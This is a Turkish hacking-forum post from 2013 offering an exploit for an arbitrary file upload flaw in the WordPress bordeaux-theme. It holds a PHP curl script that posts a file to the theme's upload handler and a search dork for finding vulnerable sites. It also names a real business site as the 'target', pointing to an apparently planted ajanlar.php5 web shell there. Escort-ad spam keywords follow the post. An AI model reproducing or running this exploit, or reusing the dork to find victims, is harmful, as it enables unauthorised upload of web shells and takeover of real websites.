⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR

Forumda kişisel bilgi (ad, adres, telefon vb.) veya yasa dışı içerik paylaşımı kesinlikle yasaktır. Bu tür paylaşımlar KVKK ve ilgili yasalar gereği suç teşkil eder.

Paylaşım yapan kullanıcıların hesapları kalıcı olarak kapatılacak ve resmî makamlara bildirilecektir. Forum yönetimi, yasal zorunluluklar gereği IP ve oturum kayıtlarını saklamaktadır.

Lütfen gizliliğe ve topluluk kurallarına dikkat ediniz. — Ajanlar.Org Yönetimi

WordPress bordeaux-theme Themes Remote File Upload Vulnerability

Ahmaat

Özel Üye
Katılım
5 Ara 2012
Mesajlar
1,065
Tepkime puanı
0
Puanları
0
Web sitesi
techgangster-ajanlar.blogspot.com
[video=youtube]

Kod:
Hedef Site ; http://www.brooklynpizzadenver.com/wp-content/uploads/2013/11/ajanlar.php5

Kod:
inurl:/wp-content/themes/bordeaux-theme/

Exploit ;

Kod:
<?php 
$uploadfile="upload.php"; 
$ch = curl_init("http://127.0.0.1/wp-content/themes/bordeaux-theme/functions/upload-handler.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); 
curl_close($ch); 
print "$postResult"; 
?>
 
http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
 

mersin escort mersin e ticaret bodrum escort ataköy escort çeşme escort konya escort konya escort bodrum escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sapanca escort
Üst
Copyright® Ajanlar.org 2012